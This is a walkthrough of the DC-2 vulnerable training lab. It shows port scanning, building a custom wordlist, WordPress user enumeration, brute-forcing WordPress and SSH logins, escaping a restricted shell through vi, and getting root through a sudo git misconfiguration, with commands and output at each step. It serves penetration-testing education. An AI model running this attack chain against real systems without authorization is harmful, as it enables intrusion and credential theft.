DC-2 Walkthrough

Description

Much like DC-1, DC-2 is another purposely built vulnerable lab for the purpose of gaining experience in the world of penetration testing. As with the original DC-1, it’s designed with beginners in mind.

Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.

Just like with DC-1, there are five flags including the final flag. The flags are important for beginners, but not so important for those who have experience.

In short, the only flag that really counts is the final flag.

Scanning

I loved the previous box and I was excited to solve this. So, without further ado, let’s start with our basic nmap scan to find out the open ports and services.

root :: ~ » nmap -A -p- 192.168.43.140
Nmap scan report for DC-2 (192.168.43.140)
Host is up (0.00067s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.10 ((Debian))
|_http-generator: WordPress 4.7.10
|_http-server-header: Apache/2.4.10 (Debian)
| http-title: DC-2 – Just another WordPress site
|_Requested resource was http://dc-2/
7744/tcp open  ssh     OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0)
| ssh-hostkey:
|   1024 52:51:7b:6e:70:a4:33:7a:d2:4b:e1:0b:5a:0f:9e:d7 (DSA)
|   2048 59:11:d8:af:38:51:8f:41:a7:44:b3:28:03:80:99:42 (RSA)
|   256 df:18:1d:74:26:ce:c1:4f:6f:2f:c1:26:54:31:51:91 (ECDSA)
|_  256 d9:38:5f:99:7c:0d:64:7e:1d:46:f6:e9:7c:c6:37:17 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

As you can see, there are 2 open ports. One of them looks like a Wordpress installation on port 80 and an out of ordinary SSH service on port 7744. I mean it’s not the standard SSH port… After visiting the site, there was a menu named “Flag”. We are going pretty fast!

Finding the first flag.

Creating a custom wordlist

The clue was obvious to me. There is a tool called “cewl”, which generates passwords based on the current target. I prepared my wordlist by typing the below command, where -d 3 specifies the depth that we are exploring and -w <file> creates a file with potential passwords.

root :: /opt/cewl » ./cewl.rb -d 3 -w ~/Downloads/passwords.txt http://dc-2/
CeWL 5.4.5 (Exclusion) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
root :: /opt/cewl » cd
root :: ~ » cd Downloads
root :: ~/Downloads » wc -c passwords.txt
    1689 passwords.txt

Wordpress enumeration

I successfully gathered 1689 words, but the login page is yet to be discovered. I ran nikto just in case and I haven’t even mentioned wpscan, which is an excellent tool for Wordpress sites and it has the ability to brute force the login page! Let’s see what turned up!

root :: ~ » wpscan --enumerate --url http://dc-2/
_______________________________________________________________
        __          _______   _____
        \ \        / /  __ \ / ____|
        \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
        \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
        \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|

        WordPress Security Scanner by the WPScan Team
                    Version 2.9.4
        Sponsored by Sucuri - https://sucuri.net
    @_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
_______________________________________________________________

[+] URL: http://dc-2/

[+] Interesting header: LINK: <http://dc-2/index.php/wp-json/>; rel="https://api.w.org/"
[+] Interesting header: LINK: <http://dc-2/>; rel=shortlink
[+] Interesting header: SERVER: Apache/2.4.10 (Debian)
[+] XML-RPC Interface available under: http://dc-2/xmlrpc.php   [HTTP 405]
[+] Found an RSS Feed: http://dc-2/index.php/feed/   [HTTP 200]
[!] Detected 1 user from RSS feed:
+-------+
| Name  |
+-------+
| admin |
+-------+
[!] Includes directory has directory listing enabled: http://dc-2/wp-includes/

[+] Enumerating WordPress version ...

[+] WordPress version 4.7.10 (Released on 2018-04-03) identified from meta generator, links opml
[!] 10 vulnerabilities identified from the version number

--- snip ---

[+] Enumerating usernames ...
[+] We identified the following 3 users:
    +----+-------+-------------+
    | ID | Login | Name        |
    +----+-------+-------------+
    | 1  | admin | admin       |
    | 2  | tom   | Tom Cat     |
    | 3  | jerry | Jerry Mouse |
    +----+-------+-------------+
[!] Default first WordPress username 'admin' is still used

--- snip ---

Well, it looks like we have more than one user to deal with. Let’s run wpscan again, but this time supply our custom password list. Here is the relevant information from the output:

root :: ~/Downloads » wpscan --url http://dc-2/ --wordlist passwords.txt

--- snip ---

[+] Starting the password brute forcer
Brute Forcing 'admin' Time: 00:00:09 <=============== > (237 / 239) 99.16%  ETA: 00:00:00
[+] [SUCCESS] Login : tom Password : parturient

[+] [SUCCESS] Login : jerry Password : adipiscing

Brute Forcing 'jerry' Time: 00:00:09 <=============== > (236 / 239) 98.74%  ETA: 00:00:00
+----+-------+-------------+------------+
| ID | Login | Name        | Password   |
+----+-------+-------------+------------+
| 1  | admin | admin       |            |
| 2  | tom   | Tom Cat     | parturient |
| 3  | jerry | Jerry Mouse | adipiscing |
+----+-------+-------------+------------+

--- snip ---

We found 2 passwords out of three. It’s not bad, right? Time to log in… First, I logged in as tom but didn’t find anything useful, so I switched to jerry. However, I found the next flag with jerry‘s account in a blog post.

Finding the second flag.

Gaining access with SSH

I thought that searching for a working exploit or uploading a PHP reverse shell would be a waste of time. So, instead of doing all those, I tried to brute force the SSH service with the same wordlist and usernames (I created a text file for the three usernames).

root :: ~ » nvim users.txt
root :: ~ » hydra -L users.txt -P ~/Downloads/passwords.txt ssh://dc-2:7744
Hydra v8.9.1 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 714 login tries (l:3/p:238), ~45 tries per task
[DATA] attacking ssh://dc-2:7744/
[STATUS] 170.00 tries/min, 170 tries in 00:01h, 546 to do in 00:04h, 16 active
[STATUS] 124.67 tries/min, 374 tries in 00:03h, 342 to do in 00:03h, 16 active
[7744][ssh] host: dc-2   login: tom   password: parturient
1 of 1 target successfully completed, 1 valid password found

I got lucky with tom, because he re-used his Wordpress account password…

root :: ~ » ssh tom@dc-2 -p 7744
The authenticity of host '[dc-2]:7744 ([192.168.43.140]:7744)' can't be established.
ECDSA key fingerprint is SHA256:ZbyT03GNDQgEmA5AMiTX2N685NTzZuOoyMDIA+DW1qU.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '[dc-2]:7744,[192.168.43.140]:7744' (ECDSA) to the list of known hosts.
tom@dc-2's password:

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
tom@DC-2:~$

Escaping rbash

The default shell for tom was rbash. It’s like a restricted shell that we want to escape to gain better control over the system. I was reading about different techniques and decided to try a trick with the vi editor.

tom@DC-2:~$ -rbash: /dev/null: restricted: cannot redirect output
bash: _upvars: `-a0': invalid number specifier
-rbash: /dev/null: restricted: cannot redirect output
bash: _upvars: `-a0': invalid number specifier
tom@DC-2:~$ vi

Inside the editor, I typed :set shell=/bin/sh and finally :shell. This will launch the standard Unix shell. After that, we can issue the /bin/bash command to switch to the Bash shell. I also noticed that we are limited in usable commands because the $PATH environment variable only contained the /home/tom/usr/bin path. So, I added the missing directories and printed out the third flag.

$ /bin/bash
tom@DC-2:~$ echo $PATH
/home/tom/usr/bin
tom@DC-2:~$ export PATH=/bin/:/usr/bin/:/usr/local/bin:$PATH
tom@DC-2:~$ ls
flag3.txt  usr
tom@DC-2:~$ cat flag3.txt
Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.

I have to admit, these hints are getting out of hand 😁

Lateral movement

I switched to jerry‘s account using the previously acquired Wordpress password. The fourth flag was in the home directory.

tom@DC-2:~$ su jerry
Password:
jerry@DC-2:/home/tom$ cd
jerry@DC-2:~$ ls
flag4.txt
jerry@DC-2:~$ cat flag4.txt
Good to see that you've made it this far - but you're not home yet.

You still need to get the final flag (the only flag that really counts!!!).

No hints here - you're on your own now.  :-)

Go on - git outta here!!!!

We got a pretty obvious hint again. I checked the allowed commands with sudo -l and yes, we can; in fact, run the git command without knowing the root password.

jerry@DC-2:~$ sudo -l
Matching Defaults entries for jerry on DC-2:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jerry may run the following commands on DC-2:
    (root) NOPASSWD: /usr/bin/git

Root shell with Git

Luckily, git has an embedded editor for the help pages, where we can execute arbitrary commands. I chose to simply execute a Bash shell. Finally, I printed out the final flag.

jerry@DC-2:~$ sudo git help status
root@DC-2:/home/jerry#
root@DC-2:/home/jerry# cd
root@DC-2:~# ls
final-flag.txt
root@DC-2:~# cat final-flag.txt
__    __     _ _       _                    _
/ / /\ \ \___| | |   __| | ___  _ __   ___  / \
\ \/  \/ / _ \ | |  / _` |/ _ \| '_ \ / _ \/  /
\  /\  /  __/ | | | (_| | (_) | | | |  __/\_/
\/  \/ \___|_|_|  \__,_|\___/|_| |_|\___\/


Congratulations!!!

A special thanks to all those who sent me tweets
and provided me with feedback - it's all greatly
appreciated.

If you enjoyed this CTF, send me a tweet via @DCAU7.

Before you go

If you found this article helpful, please share to help others with similar interest find it! + Feedback and donations are always welcome!